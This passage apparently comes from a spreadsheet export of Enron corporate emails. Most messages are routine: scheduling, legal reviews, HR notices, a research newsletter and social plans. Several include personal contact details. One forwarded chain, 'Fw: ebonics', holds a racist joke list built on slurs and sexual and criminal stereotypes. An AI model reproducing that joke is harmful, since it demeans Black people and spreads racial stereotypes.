_x000D_
Thanks,_x000D_
_x000D_
Kim_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Mon, 2 Oct 2000 12:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Teams</t>
  </si>
  <si>
    <t>Christine:_x000D_
_x000D_
Sorry I haven't replied sooner.  Crazy day.  Consider yourself the 5th member _x000D_
of our team---but remember, no warranties included._x000D_
_x000D_
Best,_x000D_
Jeff</t>
  </si>
  <si>
    <t>Tue, 2 Jan 2001 02:34:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Schedule and Vacation Days</t>
  </si>
  <si>
    <t>Please set the following vacation days for me on the schedule:  March 19 to _x000D_
23._x000D_
_x000D_
Also, please note:  Scott will be out of town the week of Jan 15 to 22; _x000D_
therefore, I will have to leave at 5:30 each evening that week to cover _x000D_
William._x000D_
_x000D_
Thanks._x000D_
_x000D_
_x000D_
Cordially,_x000D_
Mary Cook_x000D_
Enron North America Corp._x000D_
1400 Smith, 38th Floor, Legal_x000D_
Houston, Texas   77002-7361_x000D_
(713) 345-7732 (phone)_x000D_
(713) 646-3490 (fax)_x000D_
mary.cook@enron.com</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 06:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kay.mann@enron.com', 'robtaylor@andrews-kurth.com'})</t>
  </si>
  <si>
    <t>Turbine Serial Numbers for UCC filing</t>
  </si>
  <si>
    <t xml:space="preserve">Rob/Kay,_x000D_
As discussed in today's meeting, I have the turbine serial numbers for you:_x000D_
_x000D_
1.  LM 6000 Serial numbers: _x000D_
_x000D_
_x000D_
_x000D_
Regards,_x000D_
Tracee_x000D_
713-345-5688_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 11 Jul 2000 14:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Goals, Accomplishments, and Resume</t>
  </si>
  <si>
    <t>Carol,_x000D_
_x000D_
I have attached the items you requested.  If you need any further information _x000D_
please let me know.  I work in the evenings so if you need anything before _x000D_
2:00 please call my cell phone.  The number is 281-300-9145._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Thank you for your help,_x000D_
_x000D_
Robin_x000D_
x57478</t>
  </si>
  <si>
    <t>Thu, 6 Jul 2000 08:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Confirm</t>
  </si>
  <si>
    <t xml:space="preserve">Susan:_x000D_
Here is the revised confirm._x000D_
</t>
  </si>
  <si>
    <t>Mon, 6 Dec 1999 02:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Counterparties for Review from 12/02/99</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Tana Jones/HOU/ECT on 12/06/99 10:45 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Alan Aronowitz_x000D_
12/06/99 10:45 AM_x000D_
To: Tana Jones/HOU/ECT@ECT_x000D_
cc: Mark - ECT Legal Taylor/HOU/ECT@ECT _x000D_
Subject: Counterparties for Review from 12/02/99_x000D_
_x000D_
No problems from the Emerging Markets Group. Please pass on. Thanks._x000D_
_x000D_
Alan_x000D_
---------------------- Forwarded by Alan Aronowitz/HOU/ECT on 12/06/99 10:45 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Rahil Jafry_x000D_
12/03/99 11:18 AM_x000D_
To: Tom Moran/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT, Stephen H _x000D_
Douglas/HOU/ECT@ECT, Mary Solmonson/HOU/ECT@ECT_x000D_
cc: Debbie R Brackett/HOU/ECT@ECT, Molly Harris/HOU/ECT@ECT, David _x000D_
King/HOU/ECT@ECT, Jeff Blumenthal/HOU/ECT@ECT, Karen Lambert/HOU/ECT@ECT, _x000D_
Peggy Hedstrom/CAL/ECT@ECT, Stacy E Dickson/HOU/ECT@ECT, Tana _x000D_
Jones/HOU/ECT@ECT, Leslie Hansen/HOU/ECT@ECT, Jeffrey T Hodge/HOU/ECT@ECT, _x000D_
Alan Aronowitz/HOU/ECT@ECT, Connie Sutton/HOU/ECT@ECT, Edmund _x000D_
Cooper/LON/ECT@ECT, Justin Boyd/LON/ECT@ECT, David Weekes/LON/ECT@ECT, Janine _x000D_
Juggins/LON/ECT@ECT, Bob Shults/HOU/ECT@ECT, David Forster/LON/ECT@ECT, Frank _x000D_
L Davis/HOU/ECT@ECT, Kim S Theriot/HOU/ECT@ECT, Rhonda L Denton/HOU/ECT@ECT, _x000D_
Linda K Loukanis/HOU/ECT@ECT, Philippe Travis/LON/ECT@ECT, Cindy _x000D_
Horn/HOU/ECT@ECT, Dianne Seib/CAL/ECT@ECT _x000D_
Subject: Counterparties for Review from 12/02/99_x000D_
_x000D_
For your review._x000D_
_x000D_
Thanks,_x000D_
Rahil_x000D_
x. 3-3206_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 15 Feb 2001 00:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Champagne</t>
  </si>
  <si>
    <t xml:space="preserve">we likely come by friday nite to pick up annie to go to the dome, and then we _x000D_
can come back early on monday to pick up wine and kick your butts at spades?_x000D_
_x000D_
_x000D_
_x000D_
	Nancy Sellers &lt;Nancy.Sellers@RobertMondavi.com&gt;_x000D_
	02/14/2001 11:53 AM_x000D_
		 _x000D_
		 To: "'Cameron'" &lt;cameron@perfect.com&gt;, "'Jeff Dasovich'" _x000D_
&lt;Jeff_Dasovich@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: Champagne_x000D_
_x000D_
Dad is picking up 2 cases of champagne for each of you tomorrow.  Please send _x000D_
me a check for $129.00 each. _x000D_
Jeff, if you guys are coming to Napa this weekend it is fine to bring the _x000D_
check along with the one for the zin ($146.29) for a total of $275.29.  We _x000D_
won't be home on Friday night but your wine will be at the house (probably _x000D_
still in the truck).:_x000D_
2 cases Coastal Zin _x000D_
2 cases Domaine Magnums. _x000D_
Will you be back on Monday??  Could pick it all up then if you _x000D_
want...Cameron's too?? _x000D_
</t>
  </si>
  <si>
    <t>Thu, 13 Dec 2001 07:35:11 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'frank.de@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'m..love@enron.com', 'lisa.kinsey@enron.com', 'john.valdes@enron.com', 'a..allen@enron.com', 'l..dinari@enron.com', 'c..gossett@enron.com', 'ann.murphy@enron.com', 's..bryan@enron.com', 's..olinger@enron.com', 'w..white@enron.com', 'david.baumbach@enron.com', 'russ.severson@enron.com', 'donna.greif@enron.com', 'm.hall@enron.com', 's..theriot@enron.com', 'martha.stevens@enron.com', 'bryce.baxter@enron.com', 'angelo.miroballi@enron.com', 'mark.mcclure@enron.com', 'rita.wynne@enron.com', 'casey.evans@enron.com', 'l..driscoll-ernest@enron.com', 'f..smith@enron.com', 'robert.superty@enron.com', 'd..winfree@enron.com', 'greg.couch@enron.com', 'diane.anderson@enron.com', 'wayne.vinson@enron.com', 't..muzzy@enron.com', 'victor.lamadrid@enron.com', 'errol.mclaughlin@enron.com', 'evelyn.aucoin@enron.com', 'kam.keiser@enron.com', 'k..ratnala@enron.com', 'scott.palmer@enron.com', 'patti.sullivan@enron.com', 'leslie.reeves@enron.com'})</t>
  </si>
  <si>
    <t>Transition</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
This is to inform you that effective immediately, your human resource representative will be Hector McLouglin. Please channel any questions or concerns to him. I will be moving over to service corporate. I would like to take this opportunity to tell you what an honor it has been servicing you. _x000D_
_x000D_
Regards_x000D_
Frank</t>
  </si>
  <si>
    <t>Mon, 28 Aug 2000 02:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'filuntz@aol.com', 'liz@luntz.com'})</t>
  </si>
  <si>
    <t>California Power Issue</t>
  </si>
  <si>
    <t xml:space="preserve">Below is an article from the Washington Post, August 14th editorial page. _x000D_
</t>
  </si>
  <si>
    <t>Wed, 9 Aug 2000 02:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: excitement</t>
  </si>
  <si>
    <t xml:space="preserve">It was great to see a friendly face!  Don't ever hesitate to wave or stop in _x000D_
and say hello.  Can you believe that I had been on the 30th floor since the _x000D_
summer of 1994?!  I know that sets some kind of record at Enron!!  It is kind _x000D_
of fun to be up here.  The appreciation for the jobs that we do in operations _x000D_
has grown over the last several years, thanks to the hard work of you and so _x000D_
many others.  _x000D_
_x000D_
My family is doing great.  The children start school tomorrow.  Meagan will _x000D_
be a junior in high school -- we took a brief trip with her this summer for _x000D_
an early look at some colleges.  It will be a big year for Amanda -- she _x000D_
starts junior high in 6th grade.  And Tyler would tell you proudly that he is _x000D_
"two and a half".  What a delight he continues to be!!  _x000D_
 _x000D_
I know that Erin has worked hard.  I hope that she and her husband are doing _x000D_
well.  --Sally  _x000D_
_x000D_
_x000D_
   _x000D_
_x000D_
_x000D_
From:  Mary Griff Gray                                                        _x000D_
     08/08/2000 08:51 AM	_x000D_
	_x000D_
	_x000D_
	                           _x000D_
	_x000D_
_x000D_
To: Sally Beck/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: excitement_x000D_
_x000D_
Sally --_x000D_
_x000D_
I acted impulsively when I saw you this a.m.  I was so excited to know you _x000D_
were on the 33rd floor where I was picking up United Way shirts that I didn't _x000D_
control my enthusiasm over seeing you._x000D_
_x000D_
I apologize if I disrupted you._x000D_
_x000D_
Griff_x000D_
_x000D_
P.S.  I hope your family is doing fine.  Erin graduates in December from _x000D_
UT-Dallas with her masters in Speech Path.  She and her husband are doing _x000D_
very well and very much in love._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 6 Feb 2002 18:39:10 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jake.thomas@enron.com', 'kourtney.nelson@enron.com', 'jim.meyer@enron.com', 'laura.wente@enron.com', 'holden.salisbury@enron.com', 'tim.heizenrader@enron.com', 'tim.belden@enron.com', 'christian.yoder@enron.com', 'legal &lt;.hall@enron.com&gt;', 'chris.mallory@enron.com', 'john.postlethwaite@enron.com', 'heather.dunton@enron.com', 'steve.swain@enron.com', 'f..calger@enron.com', 'michael.etringer@enron.com', 'donald.robinson@enron.com', 'donna.sheidun@enron.com', 'david.steiner@enron.com', 'chris.stokley@enron.com', 'ryan.slinger@enron.com', 'eugene.lee@enron.com', 'john.anderson@enron.com', 'mollie.gustafson@enron.com', 'debra.davidson@enron.com', 'jeff.richter@enron.com', 'bill.williams@enron.com', 'jill.chatterton@enron.com', 'mike.swerzbin@enron.com', 'maria.van@enron.com', 'albert.meyers@enron.com', 'susan.amador@enron.com', 'fran.chang@enron.com', 'cara.semperger@enron.com', 'phillip.platter@enron.com', 'john.oh@enron.com', 'geir.solberg@enron.com', 'chris.lackey@enron.com', 'stephen.thome@enron.com', 'victor.bulbes@enron.com', 'diana.scholtes@enron.com', 'michael.mier@enron.com', 'diane.cutsforth@enron.com', 'sean.crandall@enron.com', 'andrea.woodland@enron.com', 'bala.kandaswamy@enron.com', 'theresa.villeggiante@enron.com', 'scotty.gilbert@enron.com', 'jeff.shields@enron.com', 'craig.dean@enron.com'})</t>
  </si>
  <si>
    <t>UBSW ENERGY KICK-OFF CELEBRATION</t>
  </si>
  <si>
    <t xml:space="preserve">Welcome to UBS Warburg Energy, LLC_x000D_
_x000D_
All UBS Warburg Energy, LLC employees are invited to join us for breakfast and happy hour on _x000D_
Friday, February 8, 2002._x000D_
_x000D_
Breakfast, 8:15 a.m., here on the 3rd floor._x000D_
_x000D_
Happy Hour, 3:00 p.m., appetizers and drinks (2),_x000D_
Fernando's Hideaway, 824 SW First Avenue (upstairs)_x000D_
_x000D_
_x000D_
We hope you will join us!_x000D_
Chris and Tim_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 7 May 2001 09:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'asrorelle@h-s.com'})</t>
  </si>
  <si>
    <t>Fw: ebonics</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Matthew Lenhart/HOU/ECT on 05/07/2001 _x000D_
04:35 PM ---------------------------_x000D_
_x000D_
_x000D_
"Ryan Lee" &lt;ralee@rmi.net&gt; on 05/07/2001 05:18:02 PM_x000D_
To: "'Ryan Renz' \(E-mail\)" &lt;ryan@mid-west.net&gt;, "Nick Woods \(E-mail\)" _x000D_
&lt;lusciouswoods@yahoo.com&gt;, &lt;matthew.lenhart@enron.com&gt;, "John McWhite" _x000D_
&lt;JMcwhite@BreeceHill.com&gt;, "Jayson Gill" &lt;dodebag@hotmail.com&gt;, "JAKE _x000D_
Istnick" &lt;jakeistnick@hotmail.com&gt;, &lt;gobrien@lucent.com&gt;, "David Shaw" _x000D_
&lt;davidishaw@yahoo.com&gt;, "Claude.Aldridge" &lt;Claude.Aldridge@yellowglobal.com&gt;, _x000D_
"Chris Tuttle" &lt;cbtuttle@hotmail.com&gt;, "Brian Beggs" &lt;brbeggs@hotmail.com&gt;, _x000D_
"Ben Abendroth" &lt;bda76@yahoo.com&gt;, "Bagby, Joel" &lt;jbagby@caprock.com&gt;, "Andy _x000D_
Patton" &lt;andy.patton@wcom.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Fw: ebonics_x000D_
_x000D_
_x000D_
_x000D_
Bitch betta recognize!_x000D_
?_x000D_
----- Original Message -----  _x000D_
From: Lee, Ryan _x000D_
To: 'ralee@rmi.net' _x000D_
Sent: Friday, April 20, 2001 9:00 AM_x000D_
Subject: FW: ebonics_x000D_
_x000D_
?_x000D_
-----Original Message-----_x000D_
From: Waters, Timothy  _x000D_
Sent: Thursday, April 19, 2001 10:27 AM_x000D_
To: Lee, Ryan;  Williams, Zach; Stone, David; Hobbs, Aaron; _x000D_
'Robert.vinton@attws.com'; 'steven.johns@attws.com'_x000D_
Subject:  ebonics_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&gt; Leroy is a 20 year-old  5th grader. This is Leroy's_x000D_
&gt; &gt; &gt;Ebonics homework assignment. He  must use each_x000D_
&gt; &gt; &gt;vocabulary word in a sentence._x000D_
&gt; &gt;  &gt;_x000D_
&gt; &gt; &gt;1. Foreclose_x000D_
&gt; &gt; &gt;If I pay alimony today, I  got no money foreclose._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;2. Rectum_x000D_
&gt;  &gt; &gt;I had two Cadillac's, but my bitch rectum both._x000D_
&gt; &gt;  &gt;_x000D_
&gt; &gt; &gt;3. Hotel_x000D_
&gt; &gt; &gt;I gave my girlfriend crabs, and  the hotel everybody._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;4.  Disappointment_x000D_
&gt; &gt; &gt;My parole officer tol' me if I miss  disappointment_x000D_
&gt; &gt; &gt;they gonna send me back to the joint.._x000D_
&gt;  &gt; &gt;_x000D_
&gt; &gt; &gt;5. Penis_x000D_
&gt; &gt; &gt;I went to the doctors and  he handed me a cup and said_x000D_
&gt; &gt; &gt;penis._x000D_
&gt; &gt; &gt;_x000D_
&gt;  &gt; &gt;6. Israel_x000D_
&gt; &gt; &gt;Tito try to sell me a Rolex. I say, "man, it  look_x000D_
&gt; &gt; &gt;fake." He say, "Bullshit, that watch israel"._x000D_
&gt; &gt;  &gt;_x000D_
&gt; &gt; &gt;7. Catacomb_x000D_
&gt; &gt; &gt;I saw Don King at da fight  the other night. Man,_x000D_
&gt; &gt; &gt;somebody get that catacomb._x000D_
&gt; &gt;  &gt;_x000D_
&gt; &gt; &gt;8. Undermine_x000D_
&gt; &gt; &gt;There's a fine lookin' ho  living in the apartment_x000D_
&gt; &gt; &gt;undermine._x000D_
&gt; &gt; &gt;_x000D_
&gt;  &gt; &gt;9. Acoustic_x000D_
&gt; &gt; &gt;When I was little, my uncle bought me  acoustic and_x000D_
&gt; &gt; &gt;took me to the poolhall._x000D_
&gt; &gt; &gt;_x000D_
&gt;  &gt; &gt;10. Iraq_x000D_
&gt; &gt; &gt;When we got to the poolhall, I tol' my uncle  iraq,_x000D_
&gt; &gt; &gt;you break._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;11.  Stain_x000D_
&gt; &gt; &gt;My mother-in-law stopped by and I axed her, "Do  you_x000D_
&gt; &gt; &gt;plan on stain for dinner?"_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt;  &gt;12. Seldom_x000D_
&gt; &gt; &gt;My cousin gave me tickets to the nicks game, so  _x000D_
&gt; &gt; &gt;seldom._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;13. Honor_x000D_
&gt;  &gt; &gt;At the rape trial, the judge axed my buddy, "Who was_x000D_
&gt; &gt;  &gt;honor first?_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;14. Dictate_x000D_
&gt; &gt;  &gt;My girfriend say my dictate good._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;15.  Odyssey_x000D_
&gt; &gt; &gt;I tol' my brother, "You odyssey the tits on that  ho!"_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;16. Axe_x000D_
&gt; &gt; &gt;After school  today, the police want to axe me some_x000D_
&gt; &gt; &gt;questions._x000D_
&gt; &gt;  &gt;_x000D_
&gt; &gt; &gt;17. Fortify_x000D_
&gt; &gt; &gt;I axed this ho on da street,  "how much?" she say_x000D_
&gt; &gt; &gt;"fortify."_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt;  &gt;18. Income_x000D_
&gt; &gt; &gt;I just got in bed wif da ho and income my  wife._x000D_
_x000D_
_x000D_
_x000D_
German  _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 30 Apr 2001 17:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Investinme - Course Offering</t>
  </si>
  <si>
    <t>Electric Business Understanding - May 2, 2001_x000D_
_x000D_
EB552 - 8:00 am - 5:00 pm          Cost:  $600.00_x000D_
_x000D_
The Electric Business Understanding Seminar will give a basic overview of the _x000D_
electric business for those with limited knowledge of this industry. This _x000D_
seminar is recommended for entry level to mid-level employees in either the _x000D_
gas or electric business or in businesses providing services to these _x000D_
industries. This course will provide you with a general understanding of how _x000D_
the electric business operates, who the key industry participants are, the _x000D_
strategies they employ to be successful, and how the business is likely to _x000D_
evolve. _x000D_
Please click here for registration  _x000D_
http://www.corptraining.com/index.cfm?company=enron.  If you have any _x000D_
questions, please call 713 853-0357.</t>
  </si>
  <si>
    <t>Mon, 7 May 2001 03:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Newsletter</t>
  </si>
  <si>
    <t xml:space="preserve">Stinson,_x000D_
_x000D_
Can you please take a quick look and fwd it to Sam_x000D_
Smith (wsmith2@enron.com)_x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 05/07/2001=_x000D_
=20_x000D_
09:59 AM ---------------------------_x000D_
_x000D_
_x000D_
VKaminski@aol.com on 05/06/2001 07:59:33 PM_x000D_
To: vkamins@enron.com_x000D_
cc: =20_x000D_
Subject: Newsletter_x000D_
_x000D_
_x000D_
A reminder: this column serves two objectives. The firstis introduction of =_x000D_
=20_x000D_
new members of the Research Group, and of the associates andsummer interns =_x000D_
=20_x000D_
rotating through the group. The second objective is to reviewinteresting =_x000D_
=20_x000D_
publications related to energy markets, quantitative finance andother topic=_x000D_
s =20_x000D_
of interest to the Enron audience. I have run out of the newmembers to =20_x000D_
introduce and it=01,s time to some real work.=20_x000D_
_x000D_
Today=01,s column is devoted to the issue of technicalanalysis. Financial =_x000D_
=20_x000D_
economists tend to dismiss technical analysis (chartism) asvoodoo science. =_x000D_
=20_x000D_
Over the last few years, however, a significant amount ofevidence that =20_x000D_
technical analysis works at least in some markets. A paperpublished recentl=_x000D_
y =20_x000D_
by Carol Osler of Federal Reserve Bank of New York (CurrencyOrders and =20_x000D_
Exchange-Rate Dynamics: Explaining the Success of Technical Analysis)review=_x000D_
s =20_x000D_
two cases in which technical analysis proved quite successful inoffering =_x000D_
=20_x000D_
useful predictions in the foreign currency markets. The firstprediction is =_x000D_
=20_x000D_
that trends tend to be reversed at identifiable support orresistance levels=_x000D_
. =20_x000D_
The second is that if a support or resistance level isbreached, trends tend=_x000D_
 =20_x000D_
to accelerate.=20_x000D_
_x000D_
The explanation of this success can be found, according toCarol Osler, in=_x000D_
=20_x000D_
the =20_x000D_
microstructure of the F/X market: take-profit and stop-lossorders tend to =_x000D_
=20_x000D_
cluster around certain typical levels (like exchange rate endingin a=20_x000D_
specific =20_x000D_
market at 00 or 50 level). For example, the author found thatthat roughly =_x000D_
=20_x000D_
2.8% of all stop-loss buy orders are triggered when the rate hitsa round =_x000D_
=20_x000D_
number, while 10.5% of take profit sales orders are triggered. Thisasymmetr=_x000D_
y =20_x000D_
explains the success of the first prediction of technical analysis. Asecond=_x000D_
 =20_x000D_
asymmetry is related to clustering of orders just above and just belowround=_x000D_
 =20_x000D_
numbers ending in 50 and 00. Stop-loss buy orders are infrequent at=20_x000D_
ratesjust =20_x000D_
below these levels, and cluster above these levels. Stop-loss sell =20_x000D_
orders,however, cluster just below 00 and 50 levels a relatively scarce at =_x000D_
=20_x000D_
rates justabove these levels. =20_x000D_
_x000D_
The question remains, why conditional orders tend tocluster at certain =20_x000D_
levels. One possibility is cognitive advantage tradersderive from managing =_x000D_
=20_x000D_
large volume of information using simplified rules.Another possibility is =_x000D_
=20_x000D_
that they follow recommendations of technical analysisin managing their =20_x000D_
books. In this case, technical analysis becomes aself-fulfilling prophecy.=_x000D_
=20_x000D_
_x000D_
Please, contact us for thecopy of the paper if this caught your attention._x000D_
 - wjk0506.doc_x000D_
</t>
  </si>
  <si>
    <t>Thu, 26 Oct 2000 01:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>(MS68) Name Change for Clearing Member Firm</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Tana Jones/HOU/ECT on 10/26/2000 08:54 AM -----_x000D_
_x000D_
=09exchangeinfo@nymex.com_x000D_
=0910/26/2000 09:36 AM_x000D_
=09=09=20_x000D_
=09=09 To: tana.jones@enron.com_x000D_
=09=09 cc:=20_x000D_
=09=09 Subject: (MS68) Name Change for Clearing Member Firm_x000D_
_x000D_
_x000D_
Member Services Notice No. 00-68_x000D_
October 24, 2000_x000D_
_x000D_
COMMODITY EXCHANGE, INC._x000D_
_x000D_
NAME CHANGE FOR CLEARING MEMBER FIRM_x000D_
_x000D_
_x000D_
 Please be advised that the Exchange has been notified that effective Octob=_x000D_
er=20_x000D_
6, 2000, MG London, Inc.  has changed it=01,s name to Enron Trading Service=_x000D_
s Inc._x000D_
_x000D_
 Inquiries regarding the above should be directed to the Member Services=20_x000D_
Department at (212) 299-2370._x000D_
_x000D_
_x000D_
_x000D_
___________________________________________________x000D_
Please click on the link below to indicate you have received this_x000D_
email._x000D_
_x000D_
"_x000D_
http://208.206.41.61/email/email_log.cfm?useremail=3Dtana.jones@enron.com&amp;r=_x000D_
efdoc_x000D_
=3D(MS68)"_x000D_
_x000D_
Note: If you click on the above line and nothing happens, please copy_x000D_
the text between the quotes, open your internet browser,_x000D_
paste it into the web site address and press Return._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Job Well Done/Bob Lee, Kenneth Parkhill</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Stinson Gibner/HOU/ECT on 02/28/2001 _x000D_
03:27 PM ---------------------------_x000D_
_x000D_
_x000D_
Mario de la Ossa@ENRON_x000D_
02/28/2001 03:26 PM_x000D_
To: Stinson Gibner/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Job Well Done/Bob Lee, Kenneth Parkhill_x000D_
_x000D_
Just wanted to pass along my appreciation for the fine work these 2 gents are _x000D_
doing on the products model.  Their attention to detail and customer focus _x000D_
has greatly facilitated the performance of my job.  Thanks, Mario._x000D_
</t>
  </si>
  <si>
    <t>Tue, 8 May 2001 03:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'customerservice@rxinet03.walgreens.com'})</t>
  </si>
  <si>
    <t>Prescriptions Ready at Walgreens</t>
  </si>
  <si>
    <t>The following prescription number requested for pickup on Tuesday, May 8th is _x000D_
now ready:_x000D_
_x000D_
*****17-03157_x000D_
_x000D_
(Only 7 digits of each prescription refill number are shown to maintain _x000D_
privacy)_x000D_
_x000D_
_x000D_
This prescription can be picked-up at:_x000D_
_x000D_
WALGREENS_x000D_
3317 Montrose Blvd._x000D_
Houston, TX 77006_x000D_
Pharmacy Phone: (713) 520-7777_x000D_
Drive Thru: Yes_x000D_
_x000D_
This pharmacy is open 24 hours a day._x000D_
_x000D_
_x000D_
_______________________________________________________x000D_
DON'T FORGET YOUR NEXT REFILL_x000D_
_x000D_
If you are refilling again next month, we can send you a reminder.  Go to our _x000D_
reminders section of our website and set prescription reminders at _x000D_
https://www.walgreens.com/pharmacy/remind/reminders.jhtml?rxr=2</t>
  </si>
  <si>
    <t>Mon, 28 Aug 2000 05:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">this guy is a regular carl lewis_x000D_
---------------------- Forwarded by Matthew Lenhart/HOU/ECT on 08/28/2000 _x000D_
12:13 PM ---------------------------_x000D_
_x000D_
_x000D_
Matthew Lenhart_x000D_
08/25/2000 02:55 PM_x000D_
To: shelliot@dttus.com_x000D_
cc:  _x000D_
_x000D_
Subject: Do not try this at home - its more painful then it looks. :)_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Matthew Lenhart/HOU/ECT on 08/25/2000 _x000D_
03:55 PM ---------------------------_x000D_
_x000D_
_x000D_
Stacy Chang &lt;Schang@cook-inlet.com&gt; on 08/25/2000 02:49:15 PM_x000D_
To: Matthew Lenhart &lt;Matthew.Lenhart@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Do not try this at home - its more painful then it looks. :)_x000D_
_x000D_
_x000D_
 Do not try this at home - its more painful then it looks. :)_x000D_
_x000D_
_x000D_
_x000D_
  &lt;&lt;pool.mpg&gt;&gt;_x000D_
_x000D_
 - pool.mpg_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 26 May 2000 09:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>LIST OF REVIEWERS</t>
  </si>
  <si>
    <t xml:space="preserve">LYNN SHIVERS, DIANE _x000D_
ELLSTROM                                                                      _x000D_
                                                          KIM THERIOT, _x000D_
STEPHANIE _x000D_
PIWETZ                                                                        _x000D_
                                                      JOE HUNTER, MELISSA _x000D_
RODRIGUEZ </t>
  </si>
  <si>
    <t>Mon, 30 Oct 2000 11:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>UH Reception Hilton/Shamrock Ballroom B</t>
  </si>
  <si>
    <t>Business casual</t>
  </si>
  <si>
    <t>Tue, 12 Sep 2000 08:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'amh5h@cms.mail.virginia.edu'})</t>
  </si>
  <si>
    <t>Amanda,_x000D_
_x000D_
Thanks for your note.  It looks to me like the schedule breaks down as _x000D_
follows:_x000D_
_x000D_
Possible Date: October 12 - 15_x000D_
My Reaction: I will be speaking at a conference in Sedona, AZ (not known for _x000D_
its great sailing)_x000D_
_x000D_
Possible Date: November 3 - 8_x000D_
My Reaction: I have another speaking engagement in NYC right after that _x000D_
(makes it sub-optimal for me) plus Bill can't go_x000D_
_x000D_
Possible Date: Thanksgiving_x000D_
My Reaction: You guys can't make it_x000D_
_x000D_
Possible Date: New Years (travel Sat. 12/30, pick up boat 12/31, back in the _x000D_
office Mon. 1/8/01)_x000D_
My Reaction: Everybody can go - and since Monday is a holiday only 4 vacation _x000D_
days used for a full week of sailing - Perfect in every way (if we can get _x000D_
flights and a boat - I haven't checked this yet)_x000D_
_x000D_
Possible Date: Later in 2001_x000D_
My Reaction: Works for me but I hate to put it off so long_x000D_
_x000D_
So my preference is to try for New Years and fall back on early November as a _x000D_
second choice.  If you want to go for less than a week now and a full week in _x000D_
2001 when Bill can go we can do that, too.  What are you guys thinking?  _x000D_
Since we won't be going at Thanksgiving, how are you going to talk your mom _x000D_
into dealing with the holiday?_x000D_
_x000D_
Mark</t>
  </si>
  <si>
    <t>Mon, 11 Dec 2000 01:02:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'terry.lehn@enron.com'})</t>
  </si>
  <si>
    <t>eStrategy</t>
  </si>
  <si>
    <t>Rod,_x000D_
_x000D_
I mentioned that I have been working on eStrategy.  I thought I would share _x000D_
with you my contributions.  The Word doc is a template that is partially _x000D_
filled in with my ideas (in blue).  Slides 6-8 are my attempt to condense my _x000D_
ideas into a couple of diagrams and e-Strategy statement.  I have worked _x000D_
primarily with Mike Sullivan on this but several others have played a _x000D_
reviewer role so far.  Of course, this is very preliminary but I thought you _x000D_
may find it interesting as you have always enjoyed technology._x000D_
_x000D_
Terry</t>
  </si>
  <si>
    <t>Tue, 6 Mar 2001 05:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dloon@uschamber.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Acapulco.  You guys are weak.  I take my wife to South Dakota for vacation _x000D_
and you losers boondoggle in sunny Mexico.  I guess its necessary since you _x000D_
will have snow on the ground until June!  Yours in jealousy, DF  </t>
  </si>
  <si>
    <t>Fri, 1 Sep 2000 03:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: California Lawmakers Vote to Limit Power Costs - WSJ</t>
  </si>
  <si>
    <t xml:space="preserve">'98 San Diego system averages:_x000D_
9.4 cents     Total rate_x000D_
